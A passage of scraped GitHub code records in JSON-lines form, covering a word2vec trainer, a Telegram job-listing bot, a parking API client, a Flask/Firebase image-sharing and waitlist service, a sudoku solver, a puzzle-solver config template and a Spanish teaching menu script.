\"./fnc-1-original/finalDatasets/train_partition.csv\"\n    aggregated_train_file = pd.read_csv(aggregated_train_path,header=0,delimiter=\",\", quoting=1)\n    print(\">>> Read file \", aggregated_train_path , \"shape:\", aggregated_train_file.shape)\n\n    # If we had unlabeled data we could use it for training as well,\n    # since word2vec does not require labeled data\n    # inputUnlabeledFile = basePath + \"test_stances_unlabeled.csv\"\n    # unlabeled_train = pd.read_csv(inputUnlabeledFile, header=0,delimiter=\",\", quoting=1)\n    # print(\">>> Read file \", inputUnlabeledFile , \"shape:\", unlabeled_train.shape)\n\n    # Word2Vec expects a list-of-lists format (a list of sentences, each sentence a list of words),\n    # so we process the text to match that format \n    # We will use the punkt tokenizer from nltk\n\n    #Download the punkt tokenizer for sentence splitting\n    #nltk.download('punkt')\n\n    # Load the punkt tokenizer\n    #tokenizer = nltk.data.load('tokenizer/punkt/english.pickle')\n\n    sentences = []\n    print(\"> Parsing sentences from training set\")\n\n    # Iterate over the file of headlines and news bodies to build the model\n    # for index,line in bodiesTrainFile.iterrows():\n    #     sentences += news_to_sentences(line['articleBody'], tokenizer)\n    \n    # for index,line in stancesTrainFile.iterrows():\n    #     sentences += news_to_sentences(line['Headline'], tokenizer)\n    \n    start = time.time()\n    for index,line in aggregated_train_file.iterrows():\n        sentences += news_to_sentences(line['ArticleBody'], tokenizer)\n        sentences += news_to_sentences(line['Headline'], tokenizer)\n    end = time.time()\n    formatTime = end - start\n\n    # Check how many sentences we have in total\n    print(\"> #Sentences: \", len(sentences))\n    # print (\"> First Sentence : \", sentences[0])\n    # print (\"> Second Sentence : \", sentences[1])\n    \n    start = time.time()\n    model_name = trainWord2Vec(sentences, fileTag)\n    end = time.time()\n    trainTime = end - start\n\n    # Export data to a csv file\n    csvOutputDir = \"./executionStats/\"\n    date = time.strftime(\"%Y-%m-%d\")\n    output_file = csvOutputDir + \"word2vec_execution_\" + date + \".csv\"\n    fieldNames = [\"date\", \"modelName\", \"formatTime\", \"trainTime\"]\n    \n    with open(output_file, 'a') as csv_file:\n        writer = csv.DictWriter(csv_file, 
fieldnames=fieldNames)\n        executionData = {\n            \"date\": time.strftime(\"%Y-%m-%d %H:%M\"),\n            \"modelName\": model_name,\n            \"formatTime\": formatTime,\n            \"trainTime\": trainTime\n        }\n        \n        newFile = os.stat(output_file).st_size == 0\n        if newFile:\n            writer.writeheader()\n        writer.writerow(executionData)\n\n    print(\">> Stats exported to: \", output_file)\n\n\nif __name__ == \"__main__\":\n    # makeWord2VecModel(False) # To train on the file with the news bodies\n    makeWord2VecModel()\n","repo_name":"ailopera/tensor_project","sub_path":"data/word2VecModel.py","file_name":"word2VecModel.py","file_ext":"py","file_size_in_byte":8784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34873518082","text":"from telegram import (\n\tReplyKeyboardMarkup, KeyboardButton, ReplyKeyboardRemove, \n\tInlineKeyboardMarkup, InlineKeyboardButton\n\t)\nfrom telegram.ext import ConversationHandler\n\nimport logging\nimport sqlalchemy\n\nimport sys\nimport os\n\nsys.path.append(os.path.dirname(__file__) + \"/../parserfrilanse/\")\n\nfrom setup_db.create_db import create_db\nfrom bot.message_texts import (\n\tKEYBOARD_BUTTON, INLINE_BUTTON, ECHO, START, GREET_USER, VERIFIED, \n\tPAY_MESSAGE, CORRECTOR, CORRECTOR_NONE\n\t)\nfrom db_connections.connections import DataBaseSelector\nfrom utils import get_cards\n\ndef query_to_base_start(bot, update, user_data):\n\tlogging.info('in def query_to_base_start')\n\tupdate.message.reply_text(\n\t\tGREET_USER, reply_markup = ReplyKeyboardRemove()\n\t\t)\n\treturn 'skill'\n\ndef last_skill(bot, update):\n\tprint(\"last_skill\")\n\ttry:\n\t\tuser_questions = open('user_questions.txt').read()\n\t\tuser_questions = user_questions.split(\":\")\n\t\tchat_id = user_questions[0]\n\t\tquestions = user_questions[1].strip().replace(\"'\",\"\")\n\n\t\tif chat_id == str(update.message.chat.id):\n\t\t\tselector = DataBaseSelector(questions)\n\t\t\tlink = selector.query_to_base_skill()\n\t\t\tcards = get_cards(link)\n\t\t\tfor card in cards:\n\t\t\t\tif card['verified'] == True:\n\t\t\t\t\tpay_metod = VERIFIED\n\t\t\t\telse: \n\t\t\t\t\tpay_metod = ''\n\t\t\t\turl = 
card['link']\n\t\t\t\tupdate.message.reply_text(PAY_MESSAGE.format(\n\t\t\t\t\ttitle = card['title'], \n\t\t\t\t\ttime = card['time'],\n\t\t\t\t\tdescription = card['description'], \n\t\t\t\t\tlist_skill = card['list_skill'], \n\t\t\t\t\tprice = card['price'], \n\t\t\t\t\tpay_metod = pay_metod, \n\t\t\t\t\tbids = card['bids']),\n\t\t\t\t\treply_markup= card_link_kb(url)\n\t\t\t\t\t)\n\texcept FileNotFoundError:\n\t\tpass\n\n\ndef query_to_base_get_skill(bot, update, user_data):\n\t\"\"\"Run the user's query against the database, launch the parser and post the answers to Telegram\"\"\"\n\tlogging.info('in def query_to_base_get_skill')\n\tuser_skill = update.message.text\n\tnone_tip = []\n\ttry:\n\t\tselector = DataBaseSelector(user_skill)\n\t\tlink = selector.query_to_base_skill()\n\n\texcept AttributeError:\n\t\tlogging.info('AttributeError')\n\t\tcorrector = DataBaseSelector(user_skill)\n\t\tuser_tip = corrector.find_in_key_words()\n\t\tlogging.info(user_tip)\n\t\tif user_tip == '[]':\n\t\t\tmessage = CORRECTOR_NONE\n\t\telse:\n\t\t\tmessage = CORRECTOR.format(user_tip)\n\t\tupdate.message.reply_text(message, reply_markup= get_keyboard())\n\t\treturn 'skill'\n\t\n\t\n\t#Run the parser on the link\n\tcards = get_cards(link)\n\tfor card in cards:\n\t\tif card['verified'] == True:\n\t\t\tpay_metod = VERIFIED\n\t\telse: \n\t\t\tpay_metod = ''\n\t\turl = card['link']\n\t\tupdate.message.reply_text(PAY_MESSAGE.format(\n\t\t\ttitle = card['title'], \n\t\t\ttime = card['time'],\n\t\t\tdescription = card['description'], \n\t\t\tlist_skill = card['list_skill'], \n\t\t\tprice = card['price'], \n\t\t\tpay_metod = pay_metod, \n\t\t\tbids = card['bids']),\n\t\t\treply_markup= card_link_kb(url)\n\t\t\t)\n\t###save the user and the query\n\tchat_id = update.message.chat.id\n\tchat_text = update.message.text\n\tuser =\"{}:{}\".format(chat_id, chat_text)\n\twith open('user_questions.txt','w',encoding = 'utf-8') as f:\n\t\tf.write(user)\n\treturn ConversationHandler.END\n\n\ndef get_keyboard():\n\tmy_keyboard = ReplyKeyboardMarkup(\n\t\t[[KEYBOARD_BUTTON],['last_skill']], \n\t\tresize_keyboard = True\n\t\t)\n\treturn my_keyboard\n\n\ndef card_link_kb(url):\n    button0 = InlineKeyboardButton(text=INLINE_BUTTON, url=url)\n    buttons_list = [[button0]]\n    keyboard = InlineKeyboardMarkup(buttons_list)\n    return keyboard \n\n\ndef greet_user(bot,update,user_data):\n\ttext = START.format((update.message.chat.first_name))\n\tupdate.message.reply_text(text, reply_markup= get_keyboard())\n\n\ndef talk_to_me(bot, update, user_data):\n\tlogging.info('talk_to_me entered')\n\t#receive the text from the user\n\tuser_text = ECHO.format(\n\t\t(update.message.chat.first_name), update.message.text)\n\n\tlogging.info(\"User: %s, Chat id: %s, Message: %s\", update.message.chat.username, \n\t\t\tupdate.message.chat.id, update.message.text)\n\n","repo_name":"DipProject-org/ParserFreelanser2","sub_path":"bot/talk_with_user.py","file_name":"talk_with_user.py","file_ext":"py","file_size_in_byte":4029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74086933811","text":"from .apiRoutes import CONFIG,REGISTRYS\nfrom .api import get,post\nimport json\nfrom parking_configuration.Registry import Registry\nimport threading\n\ndef post_registrys_async(registrys,token,session):\n    try:\n        threading.Thread(target=postRegistrys, args=(registrys,token,session)).start()\n    except Exception as e: print(e)\n\ndef postRegistrys(registrys,token,session):\n\tformattedRegistrys = []\n\t\n\tfor registry in registrys:\n\t\tformattedRegistrys.append(\n\t\t\t{\n\t\t\t\t\"fecha\": registry.fecha,\n\t\t\t\t\"idParking\": registry.idParking,\n\t\t\t\t\"patente\": registry.patente,\n\t\t\t\t\"tipo\": registry.tipo,\n\t\t\t\t\"cameraId\": registry.cameraId\n\t\t\t}\t\n\t\t)\n\n\tdata = {\n\t\t\"registrys\": formattedRegistrys\n\t}\n\n\treturn post(REGISTRYS,data,token,session)\n\ndef getRegistrys(token):\n\tresponse = get(REGISTRYS,token)\n\tresponse = json.loads(response.content)\n\tregistrys = []\n\tfor registry in response:\n\t\tregistry_new = Registry(registry['id'],registry['fecha'],registry['idParking'],registry['patente'],registry['tipo'],registry['cameraId'])\n\t\tregistry_new.id = registry['id']\n\t\tregistrys.append(registry_new)\n\treturn registrys\n","repo_name":"luke92/crv-smart-parking-system","sub_path":"parking-detection/services/registrys.py","file_name":"registrys.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23299677412","text":"import io\nimport TS\nimport time\nimport uuid\nimport json\nimport flask\nimport base64\nimport imghdr\nimport yagmail\nimport datetime\nimport requests\nimport threading\nimport firebase_admin\nfrom flask_cors import CORS\nfrom firebase_admin import db\nfrom flask import request, render_template, 
url_for\nfirebase_admin.initialize_app(firebase_admin.credentials.Certificate(\"./auth.json\"), {\"databaseURL\": \"https://tensorshareio-default-rtdb.firebaseio.com/\"})\napp = flask.Flask(__name__)\nmac = yagmail.SMTP(user=TS.email.auth.mail, password=TS.email.auth.pwd)\nCORS(app, resources={\"/*\": {\"origins\": \"*\"}})\ndbref = db.reference().get()\ndef get_tokens():\n return db.reference(\"/tokens\").get()\n\n@app.route(\"/waitlist\", methods=[\"GET\"])\ndef waitlist():\n return render_template(\"waitlist.html\", endpoint=TS.sys.endpoint)\n\n@app.route(\"/waitlist/add_user\", methods=[\"PUT\"])\ndef waitlist_add_user(): # sourcery skip: remove-unnecessary-else, simplify-fstring-formatting, swap-if-else-branches\n if TS.email.getFormated(request.args.get(\"email\")) in db.reference(\"/waitlist/emails\").get():\n return json.dumps({\"error\": \"Email already in waitlist\", \"code\": 32})\n email = request.args.get(\"email\")\n femail = TS.email.getFormated(email)\n name = request.args.get(\"name\")\n utk = str(uuid.uuid4()).replace(\"-\", \".\")\n html = f\"\"\"\n \"Thank\n

    Hello, {name}, you've been added to the waitlist.\n
    We sent you this email as a confirmation for your subscription to the TensorShare waitlist!\n
    If you did not wish to be added to the waitlist, you may click here to unsubscribe
    \n \"\"\"\n mac.send(to=email, subject=f\"Hello, {name}, you've been added to the waitlist.\", contents=[html])\n db.reference(f\"/waitlist/emails/{femail}\").set({\n \"confirmed\": \"true\",\n \"utk\": utk,\n \"email\": email,\n \"name\": name\n })\n return json.dumps({\"success\": True})\n\n@app.route(\"/waitlist/remove_user\", methods=[\"DELETE\"])\ndef waitlist_remove_user():\n if TS.email.getFormated(request.args.get(\"email\")) in db.reference(\"/waitlist/emails\").get():\n if db.reference(\"/waitlist/emails/\"+TS.email.getFormated(request.args.get(\"email\"))).get()[\"utk\"] == request.args.get(\"utk\"):\n data = db.reference(\"/waitlist/emails/\"+TS.email.getFormated(request.args.get(\"email\"))).get()\n db.reference(\"/waitlist/emails/\"+TS.email.getFormated(request.args.get(\"email\"))).delete()\n return json.dumps({\"success\": True, \"name\": data[\"name\"], \"email\": data[\"email\"]})\n return json.dumps({\"error\": \"UTK doesn't match\", \"success\": False, \"code\": 403})\n return json.dumps({\"error\": \"Email not in database\", \"success\": False, \"code\": 404})\n\n@app.route(\"/waitlist/unsubscribe/\", methods=[\"GET\"])\ndef waitlist_unsubscribe():\n email = request.args.get(\"email\")\n femail = TS.email.getFormated(email)\n if TS.email.getFormated(email) in db.reference(\"/waitlist/emails\").get():\n data = db.reference(f\"/waitlist/emails/{femail}\").get()\n return flask.render_template(\"unsubscribe.html\", name=data[\"name\"].split(\" \")[0])\n return flask.redirect(\"/waitlist\")\n\n@app.route(\"/waitlist/thanks\", methods=[\"GET\"])\ndef waitlist_thanks():\n email = request.args.get(\"email\")\n emailProvider = email.split(\"@\")[-1]\n return render_template(\"thanks.html\", name=request.args.get(\"name\", db.reference(\"/waitlist/emails/\"+TS.email.getFormated(email)).get()[\"name\"]) , email=email, emailProvider=f\"https://{emailProvider}\")\n\n@app.route(\"/waitlist/sorry\")\ndef waitlist_sorry():\n email = request.args.get(\"email\")\n return render_template(\"sorry.html\", email=email, name=request.args.get(\"name\", \"Unknown user\"))\n\n@app.route(\"/waitlist/thanks/image\", methods=[\"GET\"])\ndef waitlist_thanks_image():\n return flask.send_file(\"./static/images/thanks.png\")\n\n@app.route(\"/post/image/\", methods=[\"GET\", \"POST\"])\ndef post_image(): # sourcery skip: simplify-fstring-formatting\n if request.args.get(\"token\") not in get_tokens().keys():\n return json.dumps({\"error\": \"Unauthorized\"})\n\n if request.data and \";base64,\" not in str(request.data) and \";base64,\" not in request.args.get(\"data\", \"\"):\n data = request.data\n elif not request.data and \";base64,\" in request.args.get(\"data\"):\n try:\n data = base64.b64decode(request.args.get(\"data\", \"\").split(\";base64,\")[-1].replace(\" \", \"+\"))\n except:\n return json.dumps({\"error\": \"Couldn't decode base64 string\"})\n elif \";base64,\" in str(request.data):\n try:\n data = base64.b64decode(str(request.data).split(\";base64,\", \"\")[-1].replace(\" \", \"+\"))\n except:\n return json.dumps({\"error\": \"Couldn't decode base64 string\"})\n elif request.args.get(\"url\", None):\n data = requests.get(request.args.get(\"url\")).content\n else:\n data = None\n\n if io.BytesIO(data).getbuffer().nbytes > TS.sys.maxSize and request.args.get(\"token\") != db.reference(\"/tokens/master\").get():\n return json.dumps({\"error\": \"Data exceeds size limit.\"})\n\n uid = TS.new.image_id()\n fmt = imghdr.what(None, data)\n \n if fmt:\n if request.args.get(\"by\") not in 
{\"anon\", \"anonymous\"} and request.args.get(\"anon\") != \"true\":\n ub = (\n request.args.get(\"by\")\n or get_tokens()[request.args.get(\"token\")][\"belongsTo\"]\n )\n else:\n ub = \"an Anonymous user\"\n\n if data:\n finalData = TS.image.getData(data, get_tokens()[request.args.get(\"token\")][\"id\"], ub, uid)\n else:\n return json.dumps({\"error\": \"Invalid data URL or body (data URL must be in base64 or body must be in binary).\"})\n db.reference(f\"/images/{uid}\").set(finalData)\n db.reference(\"/tokens/\"+request.args.get(\"token\")+\"/uploads\").update({len(db.reference(\"/tokens/\"+request.args.get(\"token\")+\"/uploads\").get()): uid})\n return json.dumps({\"success\": True, \"url\": f\"{TS.sys.endpoint}/{uid}.{fmt}\"})\n\n else:\n return json.dumps({\"error\": \"Media type not supported\"})\n\n@app.route(\"//\", methods=[\"GET\"])\ndef view(img: str): # sourcery skip: collection-builtin-to-comprehension, remove-redundant-if, remove-unnecessary-else, swap-if-else-branches\n image = img.split(\".\")[0]\n got = db.reference(f\"/images/{image}\").get()\n \n if got:\n if TS.request.is_from_browser(request.user_agent):\n if \"b64\" not in got:\n b64im = str(base64.b64encode(got[\"data\"].encode(TS.config.encoding.fmt)))[2:-1]\n else:\n b64im = got[\"b64\"]\n return render_template(\n \"main.html\",\n name=image,\n nameU=image.upper(),\n data=b64im,\n fmt=got[\"fmt\"],\n fmtU=got[\"fmt\"].upper(),\n uploadedBy=got[\"uploadedBy\"][\"name\"],\n iat=str(datetime.datetime.now()) if \"iat\" not in got else got[\"iat\"],\n size=\"0\" if \"size\" not in got else got[\"size\"],\n colData=\"0,0,0;0,0,0;0,0,0;0,0,0;:0,0,0\" if \"colData\" not in got else got[\"colData\"],\n dimen=\"0,0\" if \"dimen\" not in got else got[\"dimen\"],\n exif=\"{}\" if \"exif\" not in got else got[\"exif\"],\n endpoint=TS.sys.endpoint\n )\n else:\n return flask.send_file(io.BytesIO(got[\"data\"].encode(TS.config.encoding.fmt)), mimetype=\"image/\"+str(got[\"fmt\"]))\n else:\n return flask.send_file(\"./static/images/404.png\")\n\n@app.route(\"//file/\", methods=[\"GET\"])\ndef img_file(img: str):\n image = img.split(\".\")[0]\n got = db.reference(f\"/images/{image}\").get()\n if got:\n return flask.send_file(io.BytesIO(got[\"data\"].encode(TS.config.encoding.fmt)), mimetype=\"image/\"+str(got[\"fmt\"]))\n else:\n return flask.send_file(\"./static/images/404.png\")\n\n@app.route(\"//data/\", methods=[\"GET\"])\ndef img_data(img: str):\n image = img.split(\".\")[0]\n got = db.reference(f\"/images/{image}\").get()\n dat = request.args.get(\"data\").lower()\n if dat == \"b64\" or dat == \"base64\":\n got[\"data\"] = None\n elif dat == \"bin\" or dat == \"binary\" or dat == \"unicode\" or dat == TS.config.encoding.fmt:\n got[\"base64\"] = None\n return got if got and \"b64\" in got else json.dumps({\"data\": None, \"fmt\": None, \"uploadedBy\": {\"name\": None, \"id\": 0000000000000000}, \"iat\": str(datetime.datetime.now()), \"size\": 0, \"b64\": None, \"colData\": \"0,0,0;0,0,0;0,0,0;0,0,0;:0,0,0\", \"dimen\": \"0,0\", \"exif\": {}})\n\n@app.route(\"/404\", methods=[\"GET\"])\ndef _404():\n return flask.send_file(\"./static/images/404.png\")\n\n@app.route(\"/favicon.ico/\", methods=[\"GET\"])\ndef icon():\n return flask.send_file(\"favicon.ico\")\n\ndef getDBRefLoop():\n global dbref\n while True:\n time.sleep(60*5)\n dbref = db.reference().get()\n\nif __name__ == '__main__':\n threading.Thread(target=getDBRefLoop, daemon=True).start()\n 
app.run()\n","repo_name":"ramondeleonca/TensorShare","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2142671388","text":"import time\n\nclass backtraking:\n\n    def __init__(self, sudoku):\n        self.tamano = len(sudoku)\n        self.sudoku = sudoku\n\n    def is_valid(self, row, col, num): # checks whether the change is valid\n        for i in range(self.tamano):\n            if self.sudoku[row][i] == num or self.sudoku[i][col] == num:\n                return False\n        start_row, start_col = 3 * (row // 3), 3 * (col // 3)\n        for i in range(3):\n            for j in range(3):\n                if self.sudoku[i + start_row][j + start_col] == num:\n                    return False\n        return True\n\n    def solve(self):\n        empty = self.find_empty()\n        if not empty:\n            return True # board solved\n\n        row, col = empty\n\n        for num in range(1, self.tamano + 1): \n            if self.is_valid(row, col, num):\n                self.sudoku[row][col] = num\n                if self.solve(): \n                    return True\n                self.sudoku[row][col] = 0 # undo the assignment if it does not lead to a viable solution\n\n        return False\n\n    def find_empty(self):\n        for i in range(self.tamano):\n            for j in range(self.tamano):\n                if self.sudoku[i][j] == 0:\n                    return (i, j) \n        return None\n\n    def print_solution(self):\n        for row in self.sudoku:\n            print(row)\n\nsudoku_board = [\n    [0, 0, 5, 0, 0, 8, 3, 9, 0],\n    [0, 3, 0, 0, 0, 0, 0, 0, 0],\n    [0, 0, 0, 7, 0, 0, 0, 8, 0],\n    [0, 0, 4, 5, 0, 0, 6, 0, 2],\n    [6, 1, 0, 0, 0, 0, 0, 0, 0],\n    [2, 0, 0, 0, 0, 0, 0, 0, 0],\n    [0, 0, 0, 0, 0, 2, 4, 0, 5],\n    [0, 0, 9, 0, 8, 0, 0, 0, 0],\n    [5, 6, 0, 0, 0, 0, 0, 0, 0],\n]\n\nsudoku_solver = backtraking(sudoku_board)\ntime1 = time.time()\n\nif sudoku_solver.solve():\n    print(\"Solución encontrada:\")\n    sudoku_solver.print_solution()\nelse:\n    print(\"No hay solución.\")\nprint(time.time() - time1)","repo_name":"Seba-Quintana/sudoku","sub_path":"backtracking/sudoku_optimizado.py","file_name":"sudoku_optimizado.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42659378755","text":"import os\nfrom os.path import join, normpath\nfrom six.moves import configparser\nimport subprocess\n\nfrom . import util\nfrom . import condor\n\ndef setup_parser(subparsers):\n    p = subparsers.add('config', help='Initialize a directory as workspace')\n    p.add_argument('dir', help='Workspace directory')\n    # p.add_argument('cfg', help='Config file')\n    p.add_argument('condor', help='HTCondor submission file template')\n\n_CONFIG_TEMPLATE = \\\n'''\n# THE RUNNING ENVIRONMENT CONFIGURATION FILE OF PUZZLE SOLVER\n#\n# Design:\n#   The whole pipeline is partitioned to run on three types of nodes:\n#   1. The local node, in which:\n#      a) user should have root access so a rich set of packages can be installed\n#      b) the processor should have relatively high frequency for single threaded tasks\n#      c) A GPU with OpenGL and EGL support is mandatory\n#      d) Ideally this node should have the largest amount of memory installed\n#   2. A GPU node, where the TensorFlow based training/testing is done\n#      a) Must support OpenGL and EGL as well.\n#         + Note: if docker is used, the nvidia/cudagl image should be used instead of nvidia/cuda.\n#           The latter one does not support OpenGL.\n#   3. 
The HTCondor submission node, where the massively parallel executions are offloaded\n#      This node should also be capable of (or allowed for) running moderate workloads.\n#      GPU is NOT required on this node.\n#\n# libosr.so and pyosr.so must be compiled on all three nodes. GPU support can\n# (and should) be disabled on HTCondor node.\n#\n# Local node should be able to ssh into GPU node and HTCondor submission node.\n# Other ssh access is not necessary.\n#\n# On all three types of nodes, the ExecPath is the directory that stores facade.py,\n# and the WorkspacePath is the directory that stores the workspace information.\n#\n# You only need to create a workspace on the local node.\n# The workspaces on the other two nodes will be deployed automatically with autorun()\n#\n# Note: each type of node only stores necessary files for its compute task,\n# in order to save hard drive space.\n[DEFAULT]\n\n[SYSTEM]\n# Host name of GPU node, SSH host alias can be used\nGPUHost = {GPUHost}\n# facade.py path on GPU node\nGPUExecPath = {GPUExecPath}\n# Workspace path on GPU node\nGPUWorkspacePath = {GPUWorkspacePath}\n\n# Host name of HTCondor submission node, SSH host alias can be used\nCondorHost = {CondorHost}\n# Extra HTCondor submission nodes, comma separated\nExtraCondorHosts =\n# facade.py path on HTCondor node\nCondorExecPath = {CondorExecPath}\n# Workspace path on HTCondor node\nCondorWorkspacePath = {CondorWorkspacePath}\n\n# How many jobs are you authorized to run in parallel on HTCondor\n# This is a hint for tasks partitioning\nCondorQuota = 150\n\nChartReslution = 2048\n\n# the email address to send the notifications\n# Note only situations that require user interactions will be notified, e.g.:\n# A job is on hold on HTCondor.\nmailto = SHOULD_NOT_BE_HERE_AND_KEEP_IT_PRIVATE\n# Sometimes we do not have access to mail locally\nmailfrom_host = SHOULD_NOT_BE_HERE_AND_KEEP_IT_PRIVATE\n\n[TrainingTrajectory]\n# RDT algorithm. This is usually the best choice among classical algorithms\nPlannerAlgorithmID = 15\n# Time limit of each instance, unit: day(s)\nCondorTimeThreshold = 0.05\n# Number of instances to run on HTCondor in order to find the solution path\nCondorInstances = 100\n\n# In this section, we use a numerical method to approximate the minimal clearance\n[TrainingKeyConf]\n# Limit the number of trajectories\nTrajectoryLimit = -1\n# Number of points on each solution trajectory as candidate key configurations\nCandidateNumber = 1024\n# How many samples do we create to estimate the clearance volume in C-space\nClearanceSample = 4096\n# HTCondor task granularity, tradeoff between minimizing overhead and\n# maximizing the parallelism\n# Default as 4 to prefer parallelism\nClearanceTaskGranularity = 4\n# How many configurations we pick from candidates as key configurations.\n# This varies among the training models\nKeyConf = 1\n\n[TrainingWeightChart]\n# How many touch configurations we shall generate for each key configuration\nTouchSample = 32768\n# Hint about the task partition\n# i.e. 
How many samples shall we generate in each worker process\n# Note: each worker process produces its own output file\nTouchSampleGranularity = 32768\n# Minimal task size hint: mesh boolean\nMeshBoolGranularity = 1024\n# Minimal task size hint: mesh boolean\n# UVProjectGranularity = 1024\n\n[TrainingCluster]\n# Format Group# = .piece1,.piece2\n# Example\n# Group0 = alpha.piece1,alpha.piece2\n# Group1 = duet.piece1\n# Group2 = duet.piece2\n\n[Prediction]\nEnable = yes\n# Set the number of processes that predict the key configuration from\n# the surface distribution, auto means number of (logic) processors\nNumberOfPredictionProcesses = auto\nNumberOfRotations = 256\nSurfacePairsToSample = 1024\nMargin = 1e-6\n# Reuse trained workspace so we can separate the training workspace from testing workspace\n# May use relative path\nReuseWorkspace = {ReuseWorkspace}\nOversamplingRatio = 10\nOversamplingClearanceSample = 128\n\n\n[GeometriK]\n\nFineMeshV = 500000\nKeyPointAttempts = 32\nKeyConfigRotations = 512\n\nEnableNotchDetection = yes\n\n[RoboGeoK]\nKeyPointAttempts = 32\nEnvKeyPoints = 1024\nKeyConfigRotations = 64\n\n[Solver]\nEnableKeyConfScreening = yes\n# Number of samples in the PreDefined Sample set\n# Not used\n# PDSSize = 4194304\nPDSBloom = 3072\n# Maximum trials before cancel\n# Not used\n# Trials = 1\n\n\n# In day(s), 0.01 ~= 14 minutes, 0.02 ~= 0.5 hour\nTimeThreshold = 0.02\n\n'''\n\ndef init_config_file(args, ws, oldws=None):\n print(f'calling init_config_file')\n interactive = (not hasattr(args, 'quiet') or not args.quiet)\n try:\n condor.extract_template(open(args.condor, 'r'), open(ws.condor_template, 'w'))\n cfg = ws.configuration_file\n print(f'config file {cfg}')\n if not os.path.isfile(cfg):\n if oldws is not None:\n old_config = configparser.ConfigParser()\n old_config.read_string(_CONFIG_TEMPLATE)\n old_dic = oldws.config_as_dict\n if 'SYSTEM' not in old_dic:\n \"\"\"\n Copy DEFAULT to SYSTEM\n This handles DEFAULT -> SYSTEM section renaming\n \"\"\"\n old_dic['SYSTEM'] = { k:v for k,v in oldws.config.items(\"DEFAULT\")}\n util.update_config_with_dict(old_config, old_dic)\n rel_old_to_new = os.path.relpath(ws.dir, start=oldws.dir)\n old_reuse = old_config.get('Prediction', 'ReuseWorkspace')\n gpu_ws = normpath(join(old_config.get('SYSTEM', 'GPUWorkspacePath'), rel_old_to_new))\n if old_reuse:\n new_reuse = os.path.relpath(join(oldws.dir, old_reuse), start=gpu_ws)\n else:\n new_reuse = ''\n dic = {\n 'GPUHost': old_config.get('SYSTEM', 'GPUHost'),\n 'GPUExecPath': old_config.get('SYSTEM', 'GPUExecPath'),\n 'GPUWorkspacePath': gpu_ws,\n 'CondorHost': old_config.get('SYSTEM', 'CondorHost'),\n 'CondorExecPath': old_config.get('SYSTEM', 'CondorExecPath'),\n 'CondorWorkspacePath': normpath(join(old_config.get('SYSTEM', 'CondorWorkspacePath'), rel_old_to_new)),\n 'ReuseWorkspace': new_reuse\n }\n if hasattr(args, 'override') and args.override is not None:\n patch = dict(item.split(\"=\") for item in args.override.split(\",\"))\n dic.update(patch)\n elif not interactive:\n pwd = str(os.getcwd())\n wspath = os.path.join(pwd, ws.dir)\n dic = {\n 'GPUHost': 'localhost',\n 'GPUExecPath': pwd,\n 'GPUWorkspacePath': wspath,\n 'CondorHost': 'localhost',\n 'CondorExecPath': pwd,\n 'CondorWorkspacePath': wspath,\n 'ReuseWorkspace': os.path.join(pwd, args.trained_workspace),\n }\n else:\n dic = {\n 'GPUHost': '',\n 'GPUExecPath': '',\n 'GPUWorkspacePath': '',\n 'CondorHost': '',\n 'CondorExecPath': '',\n 'CondorWorkspacePath': '',\n 'ReuseWorkspace': args.trained_workspace,\n }\n 
print(f'Creating config file at {cfg}')\n print(_CONFIG_TEMPLATE.format(**dic), file=open(cfg, 'w'))\n if interactive:\n EDITOR = os.environ.get('EDITOR', 'vim')\n subprocess.run([EDITOR, cfg])\n except FileNotFoundError as e:\n print(e)\n return\n # print('''The Puzzle Workspace is Ready! Use 'runall' to run the pipeline automatically.''')\n # print('''Use -h to list commands to run each pipeline stage independently.''')\n","repo_name":"xinyazhang/PuzzleTunnelDiscovery","sub_path":"src/GP/pipeline/envconfig.py","file_name":"envconfig.py","file_ext":"py","file_size_in_byte":9153,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"21"} +{"seq_id":"19544195309","text":"from Menu import Menu\r\nimport os\r\n\r\nclass Sentencias(Menu):\r\n\r\n def __init__(self):\r\n pass\r\n\r\n def menu_sentencias(self):\r\n opcion = self.menu([\"1) Ingreso de Datos\", \"2) If - Elif - Else\", \"3) Funciones\", \"4) Operadores Logicos\", \"5) Operador Ternario\", \"6) If - In\", \"7) Salir\"], \"*\" * 18 + \" MENU SENTENCIAS \" + \"*\" * 18)\r\n os.system(\"cls\")\r\n if opcion == '1':\r\n print(\"*\" * 17 + \" INGRESO DE DATOS \" + \"*\" * 17)\r\n nombre = input(\"Ingrese su nombre: \")\r\n edad = int(input(\"Ingrese su edad: \"))\r\n sueldo = float(input(\"Ingrese su sueldo: \"))\r\n print(\"Hola, \" + nombre)\r\n edadFutura = edad + 20\r\n print(\"Tu edad es: \", edad)\r\n print(\"Tu edad (dentro de 20 años) sera: {}\".format(edadFutura))\r\n print(\"Tu sueldo es: \", sueldo)\r\n\r\n input(\"\\nPresione una tecla para continuar...\"), os.system(\"cls\"), self.menu_sentencias()\r\n\r\n elif opcion == '2':\r\n print(\"*\" * 16 + \" IF - ELIF - ELSE \" + \"*\" * 16)\r\n print(\"¿Determinar si la persona es mayor de edad?\")\r\n\r\n edad = int(input(\"Ingrese su edad: \"))\r\n\r\n if edad > 18:\r\n print(\"Eres mayor de edad.\")\r\n elif edad == 18:\r\n print(\"Tienes 18 años\")\r\n else:\r\n print(\"No eres mayor de edad.\")\r\n\r\n input(\"\\nPresione una tecla para continuar...\"), os.system(\"cls\"), self.menu_sentencias()\r\n\r\n elif opcion == '3':\r\n print(\"*\" * 21 + \" FUNCIONES \" + \"*\" * 21)\r\n def saludar():\r\n print(\"Leonardo\")\r\n print(\"Arroba\")\r\n print(\"Zancorw\")\r\n return \"Hola\"\r\n print(saludar())\r\n\r\n def evalurSueldoMinimo(sueldo):\r\n if sueldo >= 425:\r\n print(\"Cumples con el sueldo\")\r\n else:\r\n print(\"Ganas menos que el sueldo minimo\")\r\n evalurSueldoMinimo(200)\r\n\r\n input(\"\\nPresione una tecla para continuar...\"), os.system(\"cls\"), 